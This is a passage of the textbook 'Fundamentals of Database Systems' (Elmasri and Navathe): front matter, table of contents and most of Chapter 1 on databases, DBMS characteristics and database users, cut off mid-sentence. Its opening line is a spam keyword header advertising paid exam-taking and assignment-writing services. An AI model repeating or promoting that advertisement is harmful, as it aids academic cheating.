CS计算机代考程序代写 SQL scheme prolog Functional Dependencies data structure information retrieval javascript c/c++ database crawler chain compiler Bioinformatics Java file system discrete mathematics gui flex finance AVL js data mining c++ ER distributed system computer architecture case study concurrency cache AI arm Excel JDBC ant algorithm interpreter Hive 9781292025605.pdf

9781292025605.pdf

Fundamentals of Database Systems
Ramez Elmasri Shamkant Navathe

Sixth Edition

Pearson Education Limited
Edinburgh Gate
Harlow
Essex CM20 2JE
England and Associated Companies throughout the world

Visit us on the World Wide Web at: www.pearsoned.co.uk

© Pearson Education Limited 2014

All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted
in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without either the
prior written permission of the publisher or a licence permitting restricted copying in the United Kingdom
issued by the Copyright Licensing Agency Ltd, Saffron House, 6–10 Kirby Street, London EC1N 8TS.

All trademarks used herein are the property of their respective owners. The use of any trademark
in this text does not vest in the author or publisher any trademark ownership rights in such
trademarks, nor does the use of such trademarks imply any affi liation with or endorsement of this
book by such owners.

British Library Cataloguing-in-Publication Data
A catalogue record for this book is available from the British Library

Printed in the United States of America

ISBN 10: 1-292-02560-3
ISBN 13: 978-1-292-02560-5

ISBN 10: 1-292-02560-3
ISBN 13: 978-1-292-02560-5

Table of Contents

P E A R S O N C U S T O M L I B R A R Y

I

1. Databases and Database Users

1

1Ramez Elmasri/Shamkant Navathe

2. Database System Concepts and Architecture

27

27Ramez Elmasri/Shamkant Navathe

3. The Relational Data Model and Relational Database Constraints

55

55Ramez Elmasri/Shamkant Navathe

4. Basic SQL

82

82Ramez Elmasri/Shamkant Navathe

5. More SQL: Complex Queries, Triggers, Views and Schema Modification

115

115Ramez Elmasri/Shamkant Navathe

6. The Relational Algebra and Relational Calculus

148

148Ramez Elmasri/Shamkant Navathe

7. Data Modeling Using the Entity-Relationship (ER) Model

201

201Ramez Elmasri/Shamkant Navathe

8. The Enhanced Entity-Relationship (EER) Model

246

246Ramez Elmasri/Shamkant Navathe

9. Relational Database Design by ER- and EER-to-Relational Mapping

287

287Ramez Elmasri/Shamkant Navathe

10. Practical Database Design Methodology and Use of UML Diagrams

309

309Ramez Elmasri/Shamkant Navathe

11. Object and Object-Relational Databases

357

357Ramez Elmasri/Shamkant Navathe

12. XML: Extensible Markup Language

420

420Ramez Elmasri/Shamkant Navathe

13. Introduction to SQL Programming Techniques

454

454Ramez Elmasri/Shamkant Navathe

II

14. Web Database Programming Using PHP

490

490Ramez Elmasri/Shamkant Navathe

15. Basics of Functional Dependencies and Normalization for Relational Databases

508

508Ramez Elmasri/Shamkant Navathe

16. Relational Database Design Algorithms and Further Dependencies

550

550Ramez Elmasri/Shamkant Navathe

17. Disk Storage, Basic File Structures, and Hashing

588

588Ramez Elmasri/Shamkant Navathe

18. Indexing Structures for Files

636

636Ramez Elmasri/Shamkant Navathe

19. Algorithms for Query Processing and Optimization

684

684Ramez Elmasri/Shamkant Navathe

20. Physical Database Design and Tuning

733

733Ramez Elmasri/Shamkant Navathe

21. Introduction to Transaction Processing Concepts and Theory

747

747Ramez Elmasri/Shamkant Navathe

22. Concurrency Control Techniques

780

780Ramez Elmasri/Shamkant Navathe

23. Database Recovery Techniques

810

810Ramez Elmasri/Shamkant Navathe

24. Database Security

836

836Ramez Elmasri/Shamkant Navathe

25. Distributed Databases

877

877Ramez Elmasri/Shamkant Navathe

26. Enhanced Data Models for Advanced Applications

929

929Ramez Elmasri/Shamkant Navathe

27. Introduction to Information Retrieval and Web Search

992

992Ramez Elmasri/Shamkant Navathe

28. Overview of Data Warehousing and OLAP

1034

1034Ramez Elmasri/Shamkant Navathe

Appendix: Alternative Diagrammatic Notations for ER Models

1050

1050Ramez Elmasri/Shamkant Navathe

Appendix: Parameters of Disks

1054

1054Ramez Elmasri/Shamkant Navathe

Appendix: Overview of the QBE Language

1058

1058Ramez Elmasri/Shamkant Navathe

III

1067

1067Index

This page intentionally left blank

Databases and
Database Users

Databases and database systems are an essentialcomponent of life in modern society: most of us
encounter several activities every day that involve some interaction with a database.
For example, if we go to the bank to deposit or withdraw funds, if we make a hotel
or airline reservation, if we access a computerized library catalog to search for a bib-
liographic item, or if we purchase something online—such as a book, toy, or com-
puter—chances are that our activities will involve someone or some computer
program accessing a database. Even purchasing items at a supermarket often auto-
matically updates the database that holds the inventory of grocery items.

These interactions are examples of what we may call traditional database applica-
tions, in which most of the information that is stored and accessed is either textual
or numeric. In the past few years, advances in technology have led to exciting new
applications of database systems. New media technology has made it possible to
store images, audio clips, and video streams digitally. These types of files are becom-
ing an important component of multimedia databases. Geographic information
systems (GIS) can store and analyze maps, weather data, and satellite images. Data
warehouses and online analytical processing (OLAP) systems are used in many
companies to extract and analyze useful business information from very large data-
bases to support decision making. Real-time and active database technology is
used to control industrial and manufacturing processes. And database search tech-
niques are being applied to the World Wide Web to improve the search for informa-
tion that is needed by users browsing the Internet.

To understand the fundamentals of database technology, however, we must start
from the basics of traditional database applications. In Section 1 we start by defin-
ing a database, and then we explain other basic terms. In Section 2, we provide a

From Chapter 1 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

1

Databases and Database Users

simple UNIVERSITY database example to illustrate our discussion. Section 3
describes some of the main characteristics of database systems, and Sections 4 and 5
categorize the types of personnel whose jobs involve using and interacting with
database systems. Sections 6, 7, and 8 offer a more thorough discussion of the vari-
ous capabilities provided by database systems and discuss some typical database
applications. Section 9 summarizes the chapter.

The reader who desires a quick introduction to database systems can study Sections
1 through 5, then skip or browse through Sections 6 through 8.

1 Introduction
Databases and database technology have a major impact on the growing use of
computers. It is fair to say that databases play a critical role in almost all areas where
computers are used, including business, electronic commerce, engineering, medi-
cine, genetics, law, education, and library science. The word database is so com-
monly used that we must begin by defining what a database is. Our initial definition
is quite general.

A database is a collection of related data.1 By data, we mean known facts that can be
recorded and that have implicit meaning. For example, consider the names, tele-
phone numbers, and addresses of the people you know. You may have recorded this
data in an indexed address book or you may have stored it on a hard drive, using a
personal computer and software such as Microsoft Access or Excel. This collection
of related data with an implicit meaning is a database.

The preceding definition of database is quite general; for example, we may consider
the collection of words that make up this page of text to be related data and hence to
constitute a database. However, the common use of the term database is usually
more restricted. A database has the following implicit properties:

■ A database represents some aspect of the real world, sometimes called the
miniworld or the universe of discourse (UoD). Changes to the miniworld
are reflected in the database.

■ A database is a logically coherent collection of data with some inherent
meaning. A random assortment of data cannot correctly be referred to as a
database.

■ A database is designed, built, and populated with data for a specific purpose.
It has an intended group of users and some preconceived applications in
which these users are interested.

In other words, a database has some source from which data is derived, some degree
of interaction with events in the real world, and an audience that is actively inter-

1We will use the word data as both singular and plural, as is common in database literature; the context
will determine whether it is singular or plural. In standard English, data is used for plural and datum for
singular.

2

Databases and Database Users

ested in its contents. The end users of a database may perform business transactions
(for example, a customer buys a camera) or events may happen (for example, an
employee has a baby) that cause the information in the database to change. In order
for a database to be accurate and reliable at all times, it must be a true reflection of
the miniworld that it represents; therefore, changes must be reflected in the database
as soon as possible.

A database can be of any size and complexity. For example, the list of names and
addresses referred to earlier may consist of only a few hundred records, each with a
simple structure. On the other hand, the computerized catalog of a large library
may contain half a million entries organized under different categories—by pri-
mary author’s last name, by subject, by book title—with each category organized
alphabetically. A database of even greater size and complexity is maintained by the
Internal Revenue Service (IRS) to monitor tax forms filed by U.S. taxpayers. If we
assume that there are 100 million taxpayers and each taxpayer files an average of five
forms with approximately 400 characters of information per form, we would have a
database of 100 × 106 × 400 × 5 characters (bytes) of information. If the IRS keeps
the past three returns of each taxpayer in addition to the current return, we would
have a database of 8 × 1011 bytes (800 gigabytes). This huge amount of information
must be organized and managed so that users can search for, retrieve, and update
the data as needed.

An example of a large commercial database is Amazon.com. It contains data for
over 20 million books, CDs, videos, DVDs, games, electronics, apparel, and other
items. The database occupies over 2 terabytes (a terabyte is 1012 bytes worth of stor-
age) and is stored on 200 different computers (called servers). About 15 million vis-
itors access Amazon.com each day and use the database to make purchases. The
database is continually updated as new books and other items are added to the
inventory and stock quantities are updated as purchases are transacted. About 100
people are responsible for keeping the Amazon database up-to-date.

A database may be generated and maintained manually or it may be computerized.
For example, a library card catalog is a database that may be created and maintained
manually. A computerized database may be created and maintained either by a
group of application programs written specifically for that task or by a database
management system. We are only concerned with computerized databases in this
text.

A database management system (DBMS) is a collection of programs that enables
users to create and maintain a database. The DBMS is a general-purpose software sys-
tem that facilitates the processes of defining, constructing, manipulating, and sharing
databases among various users and applications. Defining a database involves spec-
ifying the data types, structures, and constraints of the data to be stored in the data-
base. The database definition or descriptive information is also stored by the DBMS
in the form of a database catalog or dictionary; it is called meta-data. Constructing
the database is the process of storing the data on some storage medium that is con-
trolled by the DBMS. Manipulating a database includes functions such as querying
the database to retrieve specific data, updating the database to reflect changes in the

3

Databases and Database Users

miniworld, and generating reports from the data. Sharing a database allows multi-
ple users and programs to access the database simultaneously.

An application program accesses the database by sending queries or requests for
data to the DBMS. A query2 typically causes some data to be retrieved; a
transaction may cause some data to be read and some data to be written into the
database.

Other important functions provided by the DBMS include protecting the database
and maintaining it over a long period of time. Protection includes system protection
against hardware or software malfunction (or crashes) and security protection
against unauthorized or malicious access. A typical large database may have a life
cycle of many years, so the DBMS must be able to maintain the database system by
allowing the system to evolve as requirements change over time.

It is not absolutely necessary to use general-purpose DBMS software to implement
a computerized database. We could write our own set of programs to create and
maintain the database, in effect creating our own special-purpose DBMS software. In
either case—whether we use a general-purpose DBMS or not—we usually have to
deploy a considerable amount of complex software. In fact, most DBMSs are very
complex software systems.

To complete our initial definitions, we will call the database and DBMS software
together a database system. Figure 1 illustrates some of the concepts we have dis-
cussed so far.

2 An Example
Let us consider a simple example that most readers may be familiar with: a
UNIVERSITY database for maintaining information concerning students, courses,
and grades in a university environment. Figure 2 shows the database structure and a
few sample data for such a database. The database is organized as five files, each of
which stores data records of the same type.3 The STUDENT file stores data on each
student, the COURSE file stores data on each course, the SECTION file stores data
on each section of a course, the GRADE_REPORT file stores the grades that students
receive in the various sections they have completed, and the PREREQUISITE file
stores the prerequisites of each course.

To define this database, we must specify the structure of the records of each file by
specifying the different types of data elements to be stored in each record. In Figure
2, each STUDENT record includes data to represent the student’s Name,
Student_number, Class (such as freshman or ‘1’, sophomore or ‘2’, and so forth), and

2The term query, originally meaning a question or an inquiry, is loosely used for all types of interactions
with databases, including modifying the data.
3We use the term file informally here. At a conceptual level, a file is a collection of records that may or
may not be ordered.

4

Databases and Database Users

Database
System

Users/Programmers

Application Programs/Queries

Software to Process
Queries/Programs

Software to Access
Stored Data

Stored Database
Stored Database

Definition
(Meta-Data)

DBMS
Software

Figure 1
A simplified database
system environment.

Major (such as mathematics or ‘MATH’ and computer science or ‘CS’); each
COURSE record includes data to represent the Course_name, Course_number,
Credit_hours, and Department (the department that offers the course); and so on. We
must also specify a data type for each data element within a record. For example, we
can specify that Name of STUDENT is a string of alphabetic characters,
Student_number of STUDENT is an integer, and Grade of GRADE_REPORT is a single
character from the set {‘A’, ‘B’, ‘C’, ‘D’, ‘F’, ‘I’}. We may also use a coding scheme to rep-
resent the values of a data item. For example, in Figure 2 we represent the Class of a
STUDENT as 1 for freshman, 2 for sophomore, 3 for junior, 4 for senior, and 5 for
graduate student.

To construct the UNIVERSITY database, we store data to represent each student,
course, section, grade report, and prerequisite as a record in the appropriate file.
Notice that records in the various files may be related. For example, the record for
Smith in the STUDENT file is related to two records in the GRADE_REPORT file that
specify Smith’s grades in two sections. Similarly, each record in the PREREQUISITE
file relates two course records: one representing the course and the other represent-
ing the prerequisite. Most medium-size and large databases include many types of
records and have many relationships among the records.

5

Databases and Database Users

Name Student_number Class Major

Smith 17 1 CS

Brown 8 2 CS

STUDENT

Course_name Course_number Credit_hours Department

Intro to Computer Science CS1310 4 CS

Data Structures CS3320 4 CS

Discrete Mathematics MATH2410 3 MATH

Database CS3380 3 CS

COURSE

Section_identifier Course_number Semester Year Instructor

85 MATH2410 Fall 07 King

92 CS1310 Fall 07 Anderson

102 CS3320 Spring 08 Knuth

112 MATH2410 Fall 08 Chang

119 CS1310 Fall 08 Anderson

135 CS3380 Fall 08 Stone

SECTION

Student_number Section_identifier Grade

17 112 B

17 119 C

8 85 A

8 92 A

8 102 B

8 135 A

GRADE_REPORT

Course_number Prerequisite_number

CS3380 CS3320

CS3380 MATH2410

CS3320 CS1310

PREREQUISITE

Figure 2
A database that stores
student and course
information.

6

Databases and Database Users

Database manipulation involves querying and updating. Examples of queries are as
follows:

■ Retrieve the transcript—a list of all courses and grades—of ‘Smith’

■ List the names of students who took the section of the ‘Database’ course
offered in fall 2008 and their grades in that section

■ List the prerequisites of the ‘Database’ course

Examples of updates include the following:

■ Change the class of ‘Smith’ to sophomore

■ Create a new section for the ‘Database’ course for this semester

■ Enter a grade of ‘A’ for ‘Smith’ in the ‘Database’ section of last semester

These informal queries and updates must be specified precisely in the query lan-
guage of the DBMS before they can be processed.

At this stage, it is useful to describe the database as a part of a larger undertaking
known as an information system within any organization. The Information
Technology (IT) department within a company designs and maintains an informa-
tion system consisting of various computers, storage systems, application software,
and databases. Design of a new application for an existing database or design of a
brand new database starts off with a phase called requirements specification and
analysis. These requirements are documented in detail and transformed into a
conceptual design that can be represented and manipulated using some computer-
ized tools so that it can be easily maintained, modified, and transformed into a data-
base implementation. (A model called the Entity-Relationship model is used for
this purpose.) The design is then translated to a logical design that can be expressed
in a data model implemented in a commercial DBMS. (A data model known as the
Relational Data Model, not detailed here, is currently the most popular approach
for designing and implementing databases using relational DBMSs.) The final stage
is physical design, during which further specifications are provided for storing and
accessing the database. The database design is implemented, populated with actual
data, and continuously maintained to reflect the state of the miniworld.

3 Characteristics of the Database Approach
A number of characteristics distinguish the database approach from the much older
approach of programming with files. In traditional file processing, each user
defines and implements the files needed for a specific software application as part of
programming the application. For example, one user, the grade reporting office, may
keep files on students and their grades. Programs to print a student’s transcript and
to enter new grades are implemented as part of the application. A second user, the
accounting office, may keep track of students’ fees and their payments. Although
both users are interested in data about students, each user maintains separate files—
and programs to manipulate these files—because each requires some data not avail-

7

Databases and Database Users

able from the other user’s files. This redundancy in defining and storing data results
in wasted storage space and in redundant efforts to maintain common up-to-date
data.

In the database approach, a single repository maintains data that is defined once
and then accessed by various users. In file systems, each application is free to name
data elements independently. In contrast, in a database, the names or labels of data
are defined once, and used repeatedly by queries, transactions, and applications.
The main characteristics of the database approach versus the file-processing
approach are the following:

■ Self-describing nature of a database system

■ Insulation between programs and data, and data abstraction

■ Support of multiple views of the data

■ Sharing of data and multiuser transaction processing

We describe each of these characteristics in a separate section. We will discuss addi-
tional characteristics of database systems in Sections 6 through 8.

3.1 Self-Describing Nature of a Database System
A fundamental characteristic of the database approach is that the database system
contains not only the database itself but also a complete definition or description of
the database structure and constraints. This definition is stored in the DBMS cata-
log, which contains information such as the structure of each file, the type and stor-
age format of each data item, and various constraints on the data. The information
stored in the catalog is called meta-data, and it describes the structure of the pri-
mary database (Figure 1).

The catalog is used by the DBMS software and also by database users who need
information about the database structure. A general-purpose DBMS software pack-
age is not written for a specific database application. Therefore, it must refer to the
catalog to know the structure of the files in a specific database, such as the type and
format of data it will access. The DBMS software must work equally well with any
number of database applications—for example, a university database, a banking
database, or a company database—as long as the database definition is stored in the
catalog.

In traditional file processing, data definition is typically part of the application pro-
grams themselves. Hence, these programs are constrained to work with only one
specific database, whose structure is declared in the application programs. For
example, an application program written in C++ may have struct or class declara-
tions, and a COBOL program has data division statements to define its files.
Whereas file-processing software can access only specific databases, DBMS software
can access diverse databases by extracting the database definitions from the catalog
and using these definitions.

For the example shown in Figure 2, the DBMS catalog will store the definitions
of all the files shown. Figure 3 shows some sample entries in a database catalog.

8

Relation_name No_of_columns

STUDENT 4

COURSE 4

SECTION 5

GRADE_REPORT 3

PREREQUISITE 2

Column_name Data_type Belongs_to_relation

Name Character (30) STUDENT

Student_number Character (4) STUDENT

Class Integer (1) STUDENT

Major Major_type STUDENT

Course_name Character (10) COURSE

Course_number XXXXNNNN COURSE

…. …. …..

…. …. …..

…. …. …..

Prerequisite_number XXXXNNNN PREREQUISITE

RELATIONS

COLUMNS

Databases and Database Users

Figure 3
An example of a database
catalog for the database
in Figure 2.

Note: Major_type is defined as an enumerated type with all known majors. XXXXNNNN
is used to define a type with four alpha characters followed by four digits.

These definitions are specified by the database designer prior to creating the actual
database and are stored in the catalog. Whenever a request is made to access, say, the
Name of a STUDENT record, the DBMS software refers to the catalog to determine
the structure of the STUDENT file and the position and size of the Name data item
within a STUDENT record. By contrast, in a typical file-processing application, the
file structure and, in the extreme case, the exact location of Name within a STUDENT
record are already coded within each program that accesses this data item.

3.2 Insulation between Programs and Data,
and Data Abstraction

In traditional file processing, the structure of data files is embedded in the applica-
tion programs, so any changes to the structure of a file may require changing all pro-
grams that access that file. By contrast, DBMS access programs do not require such
changes in most cases. The structure of data files is stored in the DBMS catalog sepa-
rately from the access programs. We call this property program-data independence.

9

Databases and Database Users

For example, a file access program may be written in such a way that it can access
only STUDENT records of the structure shown in Figure 4. If we want to add another
piece of data to each STUDENT record, say the Birth_date, such a program will no
longer work and must be changed. By contrast, in a DBMS environment, we only
need to change the description of STUDENT records in the catalog (Figure 3) to
reflect the inclusion of the new data item Birth_date; no programs are changed. The
next time a DBMS program refers to the catalog, the new structure of STUDENT
records will be accessed and used.

In some types of database systems, such as object-oriented and object-relational
systems, users can define operations on data as part of the database definitions. An
operation (also called a function or method) is specified in two parts. The interface
(or signature) of an operation includes the operation name and the data types of its
arguments (or parameters). The implementation (or method) of the operation is
specified separately and can be changed without affecting the interface. User appli-
cation programs can operate on the data by invoking these operations through their
names and arguments, regardless of how the operations are implemented. This may
be termed program-operation independence.

The characteristic that allows program-data independence and program-operation
independence is called data abstraction. A DBMS provides users with a conceptual
representation of data that does not include many of the details of how the data is
stored or how the operations are implemented. Informally, a data model is a type of
data abstraction that is used to provide this conceptual representation. The data
model uses logical concepts, such as objects, their properties, and their interrela-
tionships, that may be easier for most users to understand than computer storage
concepts. Hence, the data model hides storage and implementation details that are
not of interest to most database users.

For example, reconsider Figures 2 and 3. The internal implementation of a file may
be defined by its record length—the number of characters (bytes) in each record—
and each data item may be specified by its starting byte within a record and its length
in bytes. The STUDENT record would thus be represented as shown in Figure 4. But
a typical database user is not concerned with the location of each data item within a
record or its length; rather, the user is concerned that when a reference is made to
Name of STUDENT, the correct value is returned. A conceptual representation of the
STUDENT records is shown in Figure 2. Many other details of file storage organiza-
tion—such as the access paths specified on a file—can be hidden from database
users by the DBMS.

Data Item Name Starting Position in Record Length in Characters (bytes)

Name 1 30

Student_number 31 4

Class 35 1

Major 36 4

Figure 4
Internal storage format
for a STUDENT
record, based on the
database catalog in
Figure 3.

10

Databases and Database Users

In the database approach, the detailed structure and organization of each file are
stored in the catalog. Database users and application programs refer to the concep-
tual representation of the files, and the DBMS extracts the details of file storage
from the catalog when these are needed by the DBMS file access modules. Many
data models can be used to provide this data abstraction to database users.

In object-oriented and object-relational databases, the abstraction process includes
not only the data structure but also the operations on the data. These operations
provide an abstraction of miniworld activities commonly understood by the users.
For example, an operation CALCULATE_GPA can be applied to a STUDENT object to
calculate the grade point average. Such operations can be invoked by the user
queries or application programs without having to know the details of how the
operations are implemented. In that sense, an abstraction of the miniworld activity
is made available to the user as an abstract operation.

3.3 Support of Multiple Views of the Data
A database typically has many users, each of whom may require a different perspec-
tive or view of the database. A view may be a subset of the database or it may con-
tain virtual data that is derived from the database files but is not explicitly stored.
Some users may not need to be aware of whether the data they refer to is stored or
derived. A multiuser DBMS whose users have a variety of distinct applications must
provide facilities for defining multiple views. For example, one user of the database
of Figure 2 may be interested only in accessing and printing the transcript of each
student; the view for this user is shown in Figure 5(a). A second user, who is inter-
ested only in checking that students have taken all the prerequisites of each course
for which they register, may require the view shown in Figure 5(b).

3.4 Sharing of Data and Multiuser Transaction Processing
A multiuser DBMS, as its name implies, must allow multiple users to access the data-
base at the same time. This is essential if data for multiple applications is to be inte-
grated and maintained in a single database. The DBMS must include concurrency
control software to ensure that several users trying to update the same data do so in
a controlled manner so that the result of the updates is correct. For example, when
several reservation agents try to assign a seat on an airline flight, the DBMS should
ensure that each seat can be accessed by only one agent at a time for assignment to a
passenger. These types of applications are generally called online transaction pro-
cessing (OLTP) applications. A fundamental role of multiuser DBMS software is to
ensure that concurrent transactions operate correctly and efficiently.

The concept of a transaction has become central to many database applications. A
transaction is an executing program or process that includes one or more database
accesses, such as reading or updating of database records. Each transaction is sup-
posed to execute a logically correct database access if executed in its entirety without
interference from other transactions. The DBMS must enforce several transaction

11

Databases and Database Users

properties. The isolation property ensures that each transaction appears to execute
in isolation from other transactions, even though hundreds of transactions may be
executing concurrently. The atomicity property ensures that either all the database
operations in a transaction are executed or none are.

The preceding characteristics are important in distinguishing a DBMS from tradi-
tional file-processing software. In Section 6 we discuss additional features that char-
acterize a DBMS. First, however, we categorize the different types of people who
work in a database system environment.

4 Actors on the Scene
For a small personal database, such as the list of addresses discussed in Section 1,
one person typically defines, constructs, and manipulates the database, and there is
no sharing. However, in large organizations, many people are involved in the design,
use, and maintenance of a large database with hundreds of users. In this section we
identify the people whose jobs involve the day-to-day use of a large database; we call
them the actors on the scene. In Section 5 we consider people who may be called
workers behind the scene—those who work to maintain the database system envi-
ronment but who are not actively interested in the database contents as part of their
daily job.

Student_name
Student_transcript

Course_number Grade Semester Year Section_id

Smith
CS1310 C Fall 08 119

MATH2410 B Fall 08 112

Brown

MATH2410 A Fall 07 85

CS1310 A Fall 07 92

CS3320 B Spring 08 102

CS3380 A Fall 08 135

TRANSCRIPT

Course_name Course_number Prerequisites

Database CS3380
CS3320

MATH2410

Data Structures CS3320 CS1310

COURSE_PREREQUISITES

(a)

(b)

Figure 5
Two views derived from the database in Figure 2. (a) The TRANSCRIPT view.
(b) The COURSE_PREREQUISITES view.

12

Databases and Database Users

4.1 Database Administrators
In any organization where many people use the same resources, there is a need for a
chief administrator to oversee and manage these resources. In a database environ-
ment, the primary resource is the database itself, and the secondary resource is the
DBMS and related software. Administering these resources is the responsibility of
the database administrator (DBA). The DBA is responsible for authorizing access
to the database, coordinating and monitoring its use, and acquiring software and
hardware resources as needed. The DBA is accountable for problems such as secu-
rity breaches and poor system response time. In large organizations, the DBA is
assisted by a staff that carries out these functions.

4.2 Database Designers
Database designers are responsible for identifying the data to be stored in the data-
base and for choosing appropriate structures to represent and store this data. These
tasks are mostly undertaken before the database is actually implemented and popu-
lated with data. It is the responsibility of database designers to communicate with
all prospective database users in order to understand their requirements and to cre-
ate a design that meets these requirements. In many cases, the designers are on the
staff of the DBA and may be assigned other staff responsibilities after the database
design is completed. Database designers typically interact with each potential group
of users and develop views of the database that meet the data and processing
requirements of these groups. Each view is then analyzed and integrated with the
views of other user groups. The final database design must be capable of supporting
the requirements of all user groups.

4.3 End Users
End users are the people whose jobs require access to the database for querying,
updating, and generating reports; the database primarily exists for their use. There
are several categories of end users:

■ Casual end users occasionally access the database, but they may need differ-
ent information each time. They use a sophisticated database query language
to specify their requests and are typically middle- or high-level managers or
other occasional browsers.

■ Naive or parametric end users make up a sizable portion of database end
users. Their main job function revolves around constantly querying and
updating the database, using standard types of queries and updates—called
canned transactions—that have been carefully programmed and tested. The
tasks that such users perform are varied:

� Bank tellers check account balances and post withdrawals and deposits.

� Reservation agents for airlines, hotels, and car rental companies check
availability for a given request and make reservations.

13

Databases and Database Users

� Employees at receiving stations for shipping companies enter package
identifications via bar codes and descriptive information through buttons
to update a central database of received and in-transit packages.

■ Sophisticated end users include engineers, scientists, business analysts, and
others who thoroughly familiarize themselves with the facilities of the
DBMS in order to implement their own applications to meet their complex
requirements.

■ Standalone users maintain personal databases by using ready-made pro-
gram packages that provide easy-to-use menu-based or graphics-based
interfaces. An example is the user of a tax package that stores a variety of per-
sonal financial data for tax purposes.

A typical DBMS provides multiple facilities to access a database. Naive end users
need to learn very little about the facilities provided by the DBMS; they simply have
to understand the user interfaces of the standard transactions designed and imple-
mented for their use. Casual users learn only a few facilities that they may use
repeatedly. Sophisticated users try to learn most of the DBMS facilities in order to
achieve their complex requirements. Standalone users typically become very profi-
cient in using a specific software package.

4.4 System Analysts and Application Programmers
(Software Engineers)

System analysts determine the requirements of end users, especially naive and
parametric end users, and develop specifications for standard canned transactions
that meet these requirements. Application programmers implement these specifi-
cations as programs; then they test, debug, document, and maintain these canned
transactions. Such analysts and programmers—commonly referred to as software
developers or software engineers—should be familiar with the full range of
capabilities provided by the DBMS to accomplish their tasks.

5 Workers behind the Scene
In addition to those who design, use, and administer a database, others are associ-
ated with the design, development, and operation of the DBMS software and system
environment. These persons are typically not interested in the database content
itself. We call them the workers behind the scene, and they include the following cat-
egories:

■ DBMS system designers and implementers design and implement the
DBMS modules and interfaces as a software package. A DBMS is a very com-
plex software system that consists of many components, or modules, includ-
ing modules for implementing the catalog, query language processing,
interface processing, accessing and buffering data, controlling concurrency,
and handling data recovery and security. The DBMS must interface with
other system software such as the operating system and compilers for vari-
ous programming languages.

14

Databases and Database Users

■ Tool developers design and implement tools—the software packages that
facilitate database modeling and design, database system design, and
improved performance. Tools are optional packages that are often purchased
separately. They include packages for database design, performance moni-
toring, natural language or graphical interfaces, prototyping, simulation,
and test data generation. In many cases, independent software vendors
develop and market these tools.

■ Operators and maintenance personnel (system administration personnel)
are responsible for the actual running and maintenance of the hardware and
software environment for the database system.

Although these categories of workers behind the scene are instrumental in making
the database system available to end users, they typically do not use the database
contents for their own purposes.

6 Advantages of Using the DBMS Approach
In this section we discuss some of the advantages of using a DBMS and the capabil-
ities that a good DBMS should possess. These capabilities are in addition to the four
main characteristics discussed in Section 3. The DBA must utilize these capabilities
to accomplish a variety of objectives related to the design, administration, and use
of a large multiuser database.

6.1 Controlling Redundancy
In traditional software development utilizing file processing, every user group
maintains its own files for handling its data-processing applications. For example,
consider the UNIVERSITY database example of Section 2; here, two groups of users
might be the course registration personnel and the accounting office. In the tradi-
tional approach, each group independently keeps files on students. The accounting
office keeps data on registration and related billing information, whereas the regis-
tration office keeps track of student courses and grades. Other groups may further
duplicate some or all of the same data in their own files.

This redundancy in storing the same data multiple times leads to several problems.
First, there is the need to perform a single logical update—such as entering data on
a new student—multiple times: once for each file where student data is recorded.
This leads to duplication of effort. Second, storage space is wasted when the same data
is stored repeatedly, and this problem may be serious for large databases. Third, files
that represent the same data may become inconsistent. This may happen because an
update is applied to some of the files but not to others. Even if an update—such as
adding a new student—is applied to all the appropriate files, the data concerning
the student may still be inconsistent because the updates are applied independently
by each user group. For example, one user group may enter a student’s birth date
erroneously as ‘JAN-19-1988’, whereas the other user groups may enter the correct
value of ‘JAN-29-1988’.

15

Databases and Database Users

Student_number Student_name Section_identifier Course_number Grade

17 Smith 112 MATH2410 B

17 Smith 119 CS1310 C

8 Brown 85 MATH2410 A

8 Brown 92 CS1310 A

8 Brown 102 CS3320 B

8 Brown 135 CS3380 A

GRADE_REPORT

Student_number Student_name Section_identifier Course_number Grade

17 Brown 112 MATH2410 B

GRADE_REPORT

(a)

(b)

Figure 6
Redundant storage
of Student_name
and Course_name in
GRADE_REPORT.
(a) Consistent data.
(b) Inconsistent
record.

In the database approach, the views of different user groups are integrated during
database design. Ideally, we should have a database design that stores each logical
data item—such as a student’s name or birth date—in only one place in the database.
This is known as data normalization, and it ensures consistency and saves storage
space. However, in practice, it is sometimes necessary to use controlled redundancy
to improve the performance of queries. For example, we may store Student_name and
Course_number redundantly in a GRADE_REPORT file (Figure 6(a)) because when-
ever we retrieve a GRADE_REPORT record, we want to retrieve the student name and
course number along with the grade, student number, and section identifier. By plac-
ing all the data together, we do not have to search multiple files to collect this data.
This is known as denormalization. In such cases, the DBMS should have the capabil-
ity to control this redundancy in order to prohibit inconsistencies among the files.
This may be done by automatically checking that the Student_name–Student_number
values in any GRADE_REPORT record in Figure 6(a) match one of the
Name–Student_number values of a STUDENT record (Figure 2). Similarly, the
Section_identifier–Course_number values in GRADE_REPORT can be checked against
SECTION records. Such checks can be specified to the DBMS during database design
and automatically enforced by the DBMS whenever the GRADE_REPORT file is
updated. Figure 6(b) shows a GRADE_REPORT record that is inconsistent with the
STUDENT file in Figure 2; this kind of error may be entered if the redundancy is not
controlled. Can you tell which part is inconsistent?

6.2 Restricting Unauthorized Access
When multiple users share a large database, it is likely that most users will not be
authorized to access all information in the database. For example, financial data is
often considered confidential, and only authorized persons are allowed to access
such data. In addition, some users may only be permitted to retrieve data, whereas

16

Databases and Database Users

others are allowed to retrieve and update. Hence, the type of access operation—
retrieval or update—must also be controlled. Typically, users or user groups are
given account numbers protected by passwords, which they can use to gain access to
the database. A DBMS should provide a security and authorization subsystem,
which the DBA uses to create accounts and to specify account restrictions. Then, the
DBMS should enforce these restrictions automatically. Notice that we can apply
similar controls to the DBMS software. For example, only the dba’s staff may be
allowed to use certain privileged software, such as the software for creating new
accounts. Similarly, parametric users may be allowed to access the database only
through the predefined canned transactions developed for their use.

6.3 Providing Persistent Storage for Program Objects
Databases can be used to provide persistent storage for program objects and data
structures. This is one of the main reasons for object-oriented database systems.
Programming languages typically have complex data structures, such as record
types in Pascal or class definitions in C++ or Java. The values of program variables
or objects are discarded once a program terminates, unless the programmer explic-
itly stores them in permanent files, which often involves converting these complex
structures into a format suitable for file storage. When the need arises to read
this data once more, the programmer must convert from the file format to the pro-
gram variable or object structure. Object-oriented database systems are compatible
with programming languages such as C++ and Java, and the DBMS software auto-
matically performs any necessary conversions. Hence, a complex object in C++ can
be stored permanently in an object-oriented DBMS. Such an object is said to be
persistent, since it survives the termination of program execution and can later be
directly retrieved by another C++ program.

The persistent storage of program objects and data structures is an important func-
tion of database systems. Traditional database systems often suffered from the so-
